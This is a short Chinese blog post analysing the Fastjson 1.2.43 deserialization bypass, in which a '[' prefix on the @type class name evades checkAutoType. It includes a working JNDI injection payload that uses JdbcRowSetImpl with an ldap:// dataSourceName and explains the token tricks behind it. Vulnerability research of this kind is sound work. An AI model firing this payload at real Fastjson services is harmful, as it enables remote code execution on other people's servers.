Java代码审计——Fastjson1.2.43反序列化漏洞

0x00 前言

反序列化总纲

1.2.24可参考:1.2.24fastjson

1.2.25-1.2.41 可参考:1.2.25

1.2.25-1.2.42 可参考:1.2.42
这篇就单纯划水~

0x01 正文

在1.2.43中,修复了LL,但是又有新的东西可以利用,因为在loadclass中还会去处理"[“那么我们现在就可以通过”["进行绕过,先上payload再进行说明

String payload="{\"@type\":\"[com.sun.rowset.JdbcRowSetImpl\"[{,\"dataSourceName\":\"ldap://localhost:9999/a\",\"autoCommit\":true" ;

首先是[com.sun.rowset.JdbcRowSetImpl,通过这个方式可以过checkAutotype检测。
Java代码审计——Fastjson1.2.43反序列化漏洞
其次是[{,"dataSourceName,这里的[{主要目的是通过fastjson的自动检测,实际上就是对token进行控制,这里如果是[的话就会让token变为14从而通过之后的检测

Java代码审计——Fastjson1.2.43反序列化漏洞
Java代码审计——Fastjson1.2.43反序列化漏洞

上一篇:java语言ajax请求Controller.


下一篇:java环境搭建